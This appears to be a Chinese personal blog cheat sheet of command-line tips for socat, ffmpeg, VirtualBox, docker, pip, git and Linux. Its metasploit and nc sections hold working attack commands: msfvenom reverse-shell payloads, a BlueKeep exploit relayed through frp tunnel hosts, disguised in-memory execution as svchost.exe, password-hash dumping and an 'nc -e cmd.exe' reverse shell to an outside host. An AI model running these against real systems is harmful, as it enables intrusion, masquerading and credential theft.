发布日期:2023-5-16 更新日期: 2023-5-20文章字数 0阅读时长:0分钟

type
Post
status
Published
date
May 16, 2023
slug
tech-cmd
summary
记录一些常用工具的命令行使用方法和技巧
tags
命令行
category
技术分享
icon
password
URL
常用工具命令

socat

# 服务端命令,监听本地IPV6的80端口,并将数据转发到IPV4地址的80端口 socat.exe -d -d tcp6-listen:80,reuseaddr,fork tcp4:0.0.0.0:80 # 客户端命令,监听本地IPV4的88端口,当客户端连接本地该端口时,自动连接到IPV6指定的地址和端口 socat.exe tcp4-listen:88,reuseaddr,fork tcp6-connect:gab.tjs.cn:80 # 连接gab.tjs.cn的9527端口,同时绑定本地cmder socat.exe -d -d tcp6:gab.tjs.cn:9527 exec:cmder.exe,pty,stder # 监听本地9527端口 socat.exe -d -d - tcp6-listen:9527

ffmpeg

# 格式转化,生成flac格式文件 ffmpeg.exe -i .\\可可托海的牧羊人-王琪.webm -c:a flac .\\out.flac

virtualbox

# 克隆虚拟磁盘文件 VBoxManage.exe clonehd disk.vmdk disk.vdi --format vdi # 为虚拟磁盘文件创建uuid VBoxManage.exe internalcommands sethduuid disk.vdi 88b9e5f5-e5e8-429f-a0d9-e81e8bcacd38 # 虚拟磁盘文件压缩 VBoxManage.exe modifyvdi disk.vdi --compact # 修改磁盘文件大小 VBoxManage.exe modifyhd cloned.vdi --resize 1228800 # windows虚拟机瘦身 sdelete.exe c:\ -z # linux虚拟机瘦身 sudo dd if=/dev/zero of=zero.fillsudo rm -f zero.fill

kali

# 更新软件源,/etc/sources.list deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib # 监控目录或文件变化 inotifywait -mrq -e 'create,delete,close_write,attrib,moved_to' --timefmt '%Y-%m-%d %H:%M' --format '%T %w%f %e' /opt/nessus/ # 内网穿透 frpc.exe -f 5dhtboyfjhrqm358:89540

patch(win7)

# 获取windows补丁信息,并保存到list.txt文件,需要删掉第一行内容 wmic qfe get hotfixid >> c:\list.txt # 生成删除补丁的批处理脚本,然后全局替换KB:kb为KB:,最后以管理员运行脚本 for /f %i in ('type c:\list.txt') do echo wusa /uninstall /kb:%i /quiet /norestart >> c:\uninstall.cmd

pip

# 查看python包的依赖关系 pipdeptree --packages flask,requests #下载对应版本的whl文件,通过重命名方式保持与tags一致即可安装该命令还可查看系统信息,包括版本、平台等 pip debug --verbose # pip.ini文件配置 [global] index-url = https://pypi.tuna.tsinghua.edu.cn/simple [install] trusted-host = mirrors.aliyun.com

docker

# 登录阿里云镜像站 docker login -u "user" -p "mypass" registry.cn-hangzhou.aliyuncs.com # 通过文件导入虚拟机 docker import my_ubuntu_v3.tar runoob/ubuntu:v4 # 创建名为default的虚拟机 docker-machine -D create default --virtualbox-no-vtx-check --driver virtualbox # 更换docker源 sudo sed -i "s|EXTRA_ARGS='|EXTRA_ARGS='--registry-mirror=https://qyps2ser.mirror.aliyuncs.com |g" /var/lib/boot2docker/profile # 启动docker docker run -it -v /c/Users/Administrator/work:/root/work:rw --name ubuntu ubuntu:latest /bin/bash # 提交docker变更内容 docker commit -a "leif.xing" -m "python3.8" a404c6c174a2 ubuntu:python3.8 # docker交互shell docker exec -it 69 bash

vim

# vim基本配置 :set term=builtin_ansi :set nu

linux

# 查看挂载卷的权限 mount | grep share # 安装工具包 sudo apt-get install network-toolssudo apt-get install inotify-toolsapt-get install p7zip p7zip-full # 查看安装包的版本信息 sudo apt-cache policy packagenamesudo pip freeze # 保持目录结构复制(需要进入到源目录,采用相对目录复制) cp --parents -R src dest # 动态链接库调试相关 ldd /bin/lsobjdump -p /path/to/programreadelf -d $executable

git

# 使用ssh协议克隆项目 git clone ssh://[email protected]/DataXujing/create_apps_in_kivy.git

metasploit

# 方式1:靶机与攻击机所用payload必须保持一致才能正常连接<cve-2019-0708># --靶机 > 创建攻击程序,使其运行攻击程序反弹shell msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.137.77 lport=4444 -f exe -o /root/reverse.exe # --攻击机 > 本地监听端口,等待靶机连接 use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.137.77set lport 4444run # 方式2:通过攻击载荷反弹shell,通过frpc实现内网穿透,适合本地局域网反弹连接<cve-2019-0708> # --攻击机 > 先做好攻击机payload设置并在指定端口监听,然后启动frpc服务,实施攻击后等待靶机连接 use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.137.77set lport 8888runfrpc -f 5dhtboyfjhrqm358:89540 # --靶机 > 实施攻击,通过服务器中转反弹shell use windows/rdp/cve_2019_0708_bluekeep_rceset payload windows/x64/meterpreter/reverse_tcpset target 2LHOST -- frpc服务器地址<cn-zz-bgp-6.natfrp.cloud>LPORT -- frpc服务器对应端口<63708>run # 在meterpreter中执行交互命令shell execute -H -i -f cmd.exe # 在靶机内存中执行攻击程序,-m表示在内存中执行,-d表示伪装进程,-a为运行参数 execute -H -m -d svchost.exe -f shell.exe -a "-o data.txt" # 获取靶机用户密码哈希值 run post/windows/gather/smart_hashdump

nc

# 攻击机反弹 shellnc.exe -lvp 8888 # 靶机命令 nc -e cmd.exe cn-zz-dhk-1.natfrp.cloud 63636

测试 测试

Notion用法的学习和测试

m1907视频接口js解密分析 m1907视频接口js解密分析

分析一个m3u8链接的解析过程